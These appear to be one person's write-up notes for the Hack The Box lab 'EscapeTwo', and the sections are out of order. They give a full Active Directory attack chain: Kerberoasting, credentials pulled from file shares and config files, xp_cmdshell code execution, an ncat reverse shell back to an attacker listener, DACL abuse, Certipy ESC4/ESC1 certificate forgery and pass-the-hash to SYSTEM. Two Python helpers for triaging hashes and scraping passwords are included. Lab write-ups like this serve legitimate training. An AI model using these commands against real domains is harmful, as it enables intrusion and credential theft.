Here are my notes on the EscapeTwo box from Hack The Box.
ESCAPETWO: 10.129.201.5
As is common in real-life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
rose:KxEPkKe6R8su
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
bloodhound-python -c All -u rose -p 'KxEPkKe6R8su' -d sequel.htb --dns-tcp -ns 10.129.201.5
BLOODHOUND-DATA:
RYAN -> WriteOwner -> CA_SVC@SEQUEL.HTB:
#WriteOwner lets ryan make himself owner of the ca_svc object; an owner can rewrite the DACL, grant himself FullControl and then reset the password.
python3 owneredit.py -action read -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
python3 owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
python3 owneredit.py -action read -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
python3 dacledit.py -action 'write' -rights 'FullControl' -principal ryan -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
#Resetting a service account's password is noisy and breaks whatever uses it; on a real engagement prefer shadow credentials (msDS-KeyCredentialLink) or a targeted Kerberoast, which the same FullControl allows. On the box a reset is fine:
net rpc password 'ca_svc' Password -U sequel.htb/ryan%WqSZAF6CysDQbGb3 -S dc01.sequel.htb
crackmapexec smb 10.129.201.5 -d sequel.htb -u ca_svc -p Password
SMB 10.129.201.5 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.201.5 445 DC01 [+] sequel.htb\ca_svc:Password
certipy find -stdout -u ca_svc@sequel.htb -p Password -dc-ip 10.129.201.5
certipy find -vulnerable -stdout -u ca_svc@sequel.htb -p Password -dc-ip 10.129.201.5
Template Name = DunderMifflinAuthentication
Certificate Authorities = sequel-DC01-CA
DNS Name : dc01.sequel.htb
#ESC4: ca_svc is in Cert Publishers, which has write access to the DunderMifflinAuthentication template, so the template itself can be rewritten into an ESC1 one.
#certipy template overwrites the template with Certipy's default ESC1-style configuration (enrollee supplies subject, client authentication allowed, no manager approval); -save-old keeps the original as DunderMifflinAuthentication.json.
certipy template -dc-ip 10.129.201.5 -u ca_svc -p 'Password' -template DunderMifflinAuthentication -target dc01.sequel.htb -save-old
#Request right after the change, before anything resets the template; the UPN in the SAN is what the DC maps to Administrator.
certipy req -ca sequel-DC01-CA -dc-ip 10.129.201.5 -u ca_svc -p 'Password' -template DunderMifflinAuthentication -target dc01.sequel.htb -upn administrator@sequel.htb
#Cleanup afterwards: certipy template ... -template DunderMifflinAuthentication -configuration DunderMifflinAuthentication.json
certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
psexec.py -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff Administrator@10.129.201.5
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.201.5.....
[-] share 'Accounting Department' is not writable.
[*] Found writable share ADMIN$
[*] Uploading file mqGorRGN.exe
[*] Opening SVCManager on 10.129.201.5.....
[*] Creating service OHrI on 10.129.201.5.....
[*] Starting service OHrI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6640]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC01
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 3705-289D
Directory of C:\Users\Administrator\Desktop
01/04/2025 07:58 AM <DIR> .
01/04/2025 07:58 AM <DIR> ..
01/15/2025 02:21 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,521,011,712 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-15 14:28:25Z)
GetUserSPNs.py -request -dc-ip 10.129.201.5 sequel.htb/rose:KxEPkKe6R8su -save -outputfile GetUserSPNS.out
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------- ------- ---------------------------------------------------- -------------------------- -------------------------- ----------
sequel.htb/sql_svc.DC01 sql_svc CN=SQLRUserGroupSQLEXPRESS,CN=Users,DC=sequel,DC=htb 2024-06-09 07:58:42.689521 2025-01-15 10:22:02.055622
sequel.htb/ca_svc.DC01 ca_svc CN=Cert Publishers,CN=Users,DC=sequel,DC=htb 2025-01-15 14:57:29.059741 2024-06-09 17:14:42.333365
[-] CCache file is not found. Skipping...
john --wordlist=/usr/share/wordlists/rockyou.txt GetUserSPNS.out
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:15 DONE (2025-01-15 15:01) 0g/s 951808p/s 1903Kc/s 1903KC/s !!12Honey..*7¡Vamos!
Session completed.
Kerberoast returned TGS hashes for sql_svc and ca_svc (both RC4, etype 23), but neither cracks with rockyou; park them for now.
No AS-REP roastable accounts.
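As an added example (not from the box or from Impacket), a small triage script for the GetUserSPNs.py output above: it parses the $krb5tgs$ lines, tells RC4 (etype 23, hashcat mode 13100, the tickets rockyou has a realistic chance against) from AES (etype 17/18, modes 19600/19700, far slower per guess), checks the checksum length so a mangled line is not fed to john, and restores the ':' that Impacket rewrites as '~' inside SPNs. The sample lines are constructed with dummy hex; only the user, realm and SPN names mirror the notes.

```python
"""Triage Kerberoast output written by Impacket's GetUserSPNs.py -outputfile.

Added example for these notes, not Impacket code. Impacket emits two layouts:
  RC4 (23):     $krb5tgs$23$*user$REALM$spn*$cksum$edata
  AES (17/18):  $krb5tgs$17$user$REALM$*spn*$cksum$edata
The checksum is 16 bytes for RC4 and 12 bytes for AES; anything else means a
truncated or mangled line.
"""
import re

TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*?(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$\*?"
    r"(?P<spn>[^$*]+)\*\$(?P<cksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)

# etype -> (cipher name, hashcat mode, checksum length in bytes)
ETYPES = {
    23: ("rc4-hmac", 13100, 16),
    17: ("aes128-cts-hmac-sha1-96", 19600, 12),
    18: ("aes256-cts-hmac-sha1-96", 19700, 12),
}

# Constructed sample: dummy hex, names taken from the notes above.
SAMPLE_LINES = [
    "$krb5tgs$23$*sql_svc$SEQUEL.HTB$sequel.htb/sql_svc.DC01*$" + "11" * 16 + "$" + "22" * 48,
    "$krb5tgs$18$ca_svc$SEQUEL.HTB$*sequel.htb/ca_svc.DC01*$" + "33" * 12 + "$" + "44" * 48,
    "$krb5tgs$23$*svc_x$SEQUEL.HTB$MSSQLSvc/dc01.sequel.htb~1433*$" + "55" * 16 + "$" + "66" * 48,
    "$krb5tgs$23$*cut$SEQUEL.HTB$host/x*$abcd$ef",   # truncated checksum
    "krb5tgs garbage",                                 # not a hash at all
]


def parse_tgs_hash(line):
    """Parse one $krb5tgs$ line into its fields; raise ValueError if it is unusable."""
    m = TGS_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$ line")
    etype = int(m["etype"])
    if etype not in ETYPES:
        raise ValueError(f"unsupported etype {etype}")
    cipher, mode, cksum_len = ETYPES[etype]
    if len(m["cksum"]) != cksum_len * 2:
        raise ValueError(f"checksum is {len(m['cksum']) // 2} bytes, expected {cksum_len} for {cipher}")
    return {
        "user": m["user"],
        "realm": m["realm"],
        "spn": m["spn"].replace("~", ":"),   # Impacket swaps ':' for '~' inside the hash
        "etype": etype,
        "cipher": cipher,
        "hashcat_mode": mode,
        "edata_bytes": len(m["edata"]) // 2,
    }


def triage(lines):
    """Split lines into (rc4, aes, bad): crack first, crack slowly, discard."""
    rc4, aes, bad = [], [], []
    for line in lines:
        if not line.strip():
            continue
        try:
            h = parse_tgs_hash(line)
        except ValueError as err:
            bad.append((line[:40], str(err)))
            continue
        (rc4 if h["etype"] == 23 else aes).append(h)
    return rc4, aes, bad


if __name__ == "__main__":
    rc4, aes, bad = triage(SAMPLE_LINES)
    for h in rc4:
        print(f"[rc4  -m {h['hashcat_mode']}] {h['user']}@{h['realm']} {h['spn']}")
    for h in aes:
        print(f"[aes  -m {h['hashcat_mode']}] {h['user']}@{h['realm']} {h['spn']}  (slow)")
    for frag, why in bad:
        print(f"[skip] {frag}... : {why}")
```

Feed it the raw GetUserSPNS.out; the RC4 list is what goes to john first, and an AES-only service account is a hint that RC4 was disabled on it rather than that the hash is broken.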
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-15T14:29:47+00:00; +18d20h58m01s from scanner time.
ldapsearch -H ldap://10.129.201.5 -x -W -D "rose@sequel.htb" -b "dc=sequel,dc=htb" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ":" '{print $2}'
ldapsearch -H ldap://10.129.201.5 -x -W -D "rose@sequel.htb" -b "dc=sequel,dc=htb" '(objectClass=person)' > ldap-people
#Nothing Interesting.
445/tcp open microsoft-ds?
crackmapexec smb 10.129.201.5 -u 'rose' -p 'KxEPkKe6R8su' --shares
SMB 10.129.201.5 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.201.5 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.201.5 445 DC01 [+] Enumerated shares
SMB 10.129.201.5 445 DC01 Share Permissions Remark
SMB 10.129.201.5 445 DC01 ----- ----------- ------
SMB 10.129.201.5 445 DC01 Accounting Department READ
SMB 10.129.201.5 445 DC01 ADMIN$ Remote Admin
SMB 10.129.201.5 445 DC01 C$ Default share
SMB 10.129.201.5 445 DC01 IPC$ READ Remote IPC
SMB 10.129.201.5 445 DC01 NETLOGON READ Logon server share
SMB 10.129.201.5 445 DC01 SYSVOL READ Logon server share
SMB 10.129.201.5 445 DC01 Users READ
sudo lookupsid.py rose@10.129.201.5 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
crackmapexec smb 10.129.201.5 -u 'rose' -p 'KxEPkKe6R8su' -M gpp_autologin
SMB 10.129.201.5 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.201.5 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
GPP_AUTO... 10.129.201.5 445 DC01 [+] Found SYSVOL share
GPP_AUTO... 10.129.201.5 445 DC01 [*] Searching for Registry.xml
crackmapexec smb 10.129.201.5 -u 'rose' -p 'KxEPkKe6R8su' -M gpp_password
SMB 10.129.201.5 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.201.5 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
GPP_PASS... 10.129.201.5 445 DC01 [+] Found SYSVOL share
GPP_PASS... 10.129.201.5 445 DC01 [*] Searching for potential XML files containing passwords
#NOTHING INTERESTING in SYSVOL.
smbclient \\\\10.129.201.5\\"Accounting Department" -U 'sequel.htb\rose'
Password for [SEQUEL.HTB\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jun 9 10:52:21 2024
.. D 0 Sun Jun 9 10:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 10:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 10:52:07 2024
6367231 blocks of size 4096. 917306 blocks available
smb: \> get accounting_2024.xlsx
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (30.5 KiloBytes/sec) (average 30.5 KiloBytes/sec)
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (34.7 KiloBytes/sec) (average 32.0 KiloBytes/sec)
accounts.xlsx:
First Name  Last Name  Email              Username  Password
----------  ---------  -----------------  --------  ----------------
Angela      Martin     angela@sequel.htb  angela    0fwz7Q4mSpurIt99
Oscar       Martinez   oscar@sequel.htb   oscar     86LxLBMgEWaKUnBG
Kevin       Malone     kevin@sequel.htb   kevin     Md9Wlq1E5bZnVDVo
                       sa@sequel.htb      sa        MSSQLP@ssw0rd!
oscar:86LxLBMgEWaKUnBG
sa:MSSQLP@ssw0rd!
accounting_2024.xlsx:
Date        Invoice Number  Vendor                  Description      Amount  Due Date    Status  Notes
----------  --------------  ----------------------  ---------------  ------  ----------  ------  ---------
9/6/2024    1001            Dunder Mifflin          Office Supplies  150$    01/15/2024  Paid
23/08/2024  1002            Business Consultancy    Consulting       500$    01/30/2024  Unpaid  Follow up
7/10/2024   1003            Windows Server License  Software         300$    02/05/2024  Paid
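Added example, not tooling from the box: a standard-library reader that pulls the username and password columns out of a workbook laid out like accounts.xlsx (an .xlsx is a zip of XML parts, so no openpyxl is needed on a minimal attack box). The workbook is constructed in memory with the same columns as the sheet above and placeholder passwords; the function names are mine.

```python
"""Dump username/password columns out of an .xlsx with the standard library.

Added example for these notes (not from the box, Impacket or LibreOffice).
An .xlsx is a zip containing xl/sharedStrings.xml (the string table) and
xl/worksheets/sheetN.xml (cells that reference it), so zipfile + ElementTree
is enough to read a credentials sheet. The workbook is built in memory here
to mirror accounts.xlsx; the passwords are placeholders.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NSMAP = {"m": NS}

# Constructed sample with the same columns as accounts.xlsx. None = empty cell
# (what LibreOffice printed as NULL on the sa row).
SAMPLE_ROWS = [
    ("First Name", "Last Name", "Email", "Username", "Password"),
    ("Angela", "Martin", "angela@sequel.htb", "angela", "placeholder-pw-1"),
    ("Oscar", "Martinez", "oscar@sequel.htb", "oscar", "placeholder-pw-2"),
    (None, None, "sa@sequel.htb", "sa", "placeholder-pw-3"),
]


def build_sample_xlsx(rows):
    """Write a minimal one-sheet workbook (shared-string cells only) to bytes."""
    strings, sheet_rows = [], []
    for r, row in enumerate(rows, start=1):
        cells = []
        for c, val in enumerate(row):
            if val is None:
                continue                      # Excel omits empty cells from <row>
            if val not in strings:
                strings.append(val)
            cells.append(f'<c r="{chr(65 + c)}{r}" t="s"><v>{strings.index(val)}</v></c>')
        sheet_rows.append(f'<row r="{r}">{"".join(cells)}</row>')
    sst = "".join(f"<si><t>{escape(s)}</t></si>" for s in strings)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/sharedStrings.xml", f'<sst xmlns="{NS}">{sst}</sst>')
        z.writestr("xl/worksheets/sheet1.xml",
                   f'<worksheet xmlns="{NS}"><sheetData>{"".join(sheet_rows)}</sheetData></worksheet>')
    return buf.getvalue()


def read_sheet(xlsx_bytes, sheet="xl/worksheets/sheet1.xml"):
    """Return rows as dicts {column letter: text}, resolving shared strings."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        shared = []
        if "xl/sharedStrings.xml" in z.namelist():
            sst = ET.fromstring(z.read("xl/sharedStrings.xml"))
            # A rich-text cell is split into several <t> runs; join them.
            shared = ["".join(t.text or "" for t in si.iter(f"{{{NS}}}t"))
                      for si in sst.findall("m:si", NSMAP)]
        ws = ET.fromstring(z.read(sheet))
    rows = []
    for row in ws.iter(f"{{{NS}}}row"):
        cells = {}
        for c in row.findall("m:c", NSMAP):
            col = re.match(r"[A-Z]+", c.get("r")).group(0)
            kind = c.get("t")
            if kind == "s":                           # index into the shared string table
                cells[col] = shared[int(c.find("m:v", NSMAP).text)]
            elif kind == "inlineStr":                 # string stored inside the cell
                cells[col] = "".join(t.text or "" for t in c.iter(f"{{{NS}}}t"))
            else:                                     # number/date/bool, raw text
                v = c.find("m:v", NSMAP)
                cells[col] = v.text if v is not None else ""
        rows.append(cells)
    return rows


def extract_credentials(xlsx_bytes):
    """Find the header row by name, then pair each Username with its Password."""
    rows = read_sheet(xlsx_bytes)
    ucol = pcol = None
    for start, row in enumerate(rows):
        headers = {v.strip().lower(): col for col, v in row.items()}
        ucol = next((col for h, col in headers.items() if "user" in h), None)
        pcol = next((col for h, col in headers.items() if "pass" in h), None)
        if ucol and pcol:
            break
    else:
        return []
    creds = []
    for row in rows[start + 1:]:
        user, pw = row.get(ucol, "").strip(), row.get(pcol, "").strip()
        if user and pw:                               # skip blank/partial rows
            creds.append((user, pw))
    return creds


def as_userpass_lines(creds):
    """user:pass lines, the form the credential list in these notes uses."""
    return [f"{u}:{p}" for u, p in creds]


if __name__ == "__main__":
    for line in as_userpass_lines(extract_credentials(build_sample_xlsx(SAMPLE_ROWS))):
        print(line)
```

Point it at a real file with `extract_credentials(open("accounts.xlsx", "rb").read())`; the header search is by name, so it does not care which column the sheet author put the password in.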
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-15T14:29:47+00:00; +18d20h58m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-15T10:22:07
|_Not valid after: 2055-01-15T10:22:07
|_ssl-date: 2025-01-15T14:29:47+00:00; +18d20h58m01s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
mssqlclient.py rose:KxEPkKe6R8su@10.129.201.5 -windows-auth
#As rose over Windows auth, nothing interesting in MSSQL; the useful bit is enable_xp_cmdshell, which works (as sa, below).
#xp_dirtree to an attacker SMB listener captures the sql_svc Net-NTLMv2 hash, but it does not crack.
mssqlclient.py sa:'MSSQLP@ssw0rd!'@10.129.201.5
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell "whoami"
output
--------------------------------------------------------------------------------
sequel\sql_svc
NULL
RCE-ACHIEVED !
Transfer a netcat binary to the target through xp_cmdshell, then have it call back to a listener for a proper shell:
xp_cmdshell "C:\Users\Public\ncat.exe -nv 10.10.14.39 1234 -e CMD"
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.39] from (UNKNOWN) [10.129.201.5] 51208
Microsoft Windows [Version 10.0.17763.6640]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
sequel\sql_svc
C:\Windows\system32>hostname
hostname
DC01
USER-SHELL !
PRIV ESC:
SQL_SVC -> RYAN:
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
C:\SQL2019\ExpressAdv_ENU>whoami
whoami
sequel\sql_svc
C:\SQL2019\ExpressAdv_ENU>dir
dir
Volume in drive C has no label.
Volume Serial Number is 3705-289D
Directory of C:\SQL2019\ExpressAdv_ENU
01/03/2025 07:29 AM <DIR> .
01/03/2025 07:29 AM <DIR> ..
06/08/2024 02:07 PM <DIR> 1033_ENU_LP
09/24/2019 09:03 PM 45 AUTORUN.INF
09/24/2019 09:03 PM 788 MEDIAINFO.XML
06/08/2024 02:07 PM 16 PackageId.dat
06/08/2024 02:07 PM <DIR> redist
06/08/2024 02:07 PM <DIR> resources
09/24/2019 09:03 PM 142,944 SETUP.EXE
09/24/2019 09:03 PM 486 SETUP.EXE.CONFIG
06/08/2024 02:07 PM 717 sql-Configuration.INI
09/24/2019 09:03 PM 249,448 SQLSETUPBOOTSTRAPPER.DLL
06/08/2024 02:07 PM <DIR> x64
7 File(s) 394,444 bytes
6 Dir(s) 3,527,270,400 bytes free
C:\SQL2019\ExpressAdv_ENU>type sql-Configuration.INI
type sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3" #sql_svc service password; reused by ryan? (confirmed over WinRM below)
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
crackmapexec winrm 10.129.201.5 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3
HTTP 10.129.201.5 5985 10.129.201.5 [*] http://10.129.201.5:5985/wsman
WINRM 10.129.201.5 5985 10.129.201.5 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)
sequel.htb\ryan:WqSZAF6CysDQbGb3
WORKS !
evil-winrm -i 10.129.201.5 -u ryan -p WqSZAF6CysDQbGb3
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
sequel\ryan
*Evil-WinRM* PS C:\Users\ryan\Documents> hostname
DC01
RYAN SHELL !
*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami
sequel\ryan
*Evil-WinRM* PS C:\Users\ryan\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\ryan\Desktop> dir
Directory: C:\Users\ryan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/15/2025 2:21 AM 34 user.txt
*Evil-WinRM* PS C:\Users\ryan\Desktop> type user.txt
[REDACTED]
USER.TXT: [REDACTED]
#Go to the BLOODHOUND-DATA section above for the continuation from the ryan user.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-15T14:29:47+00:00; +18d20h58m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-15T14:29:47+00:00; +18d20h58m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 18d20h58m00s, deviation: 0s, median: 18d20h58m00s
| smb2-time:
| date: 2025-01-15T14:29:06
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
PORT STATE SERVICE
53/udp open domain
123/udp open ntp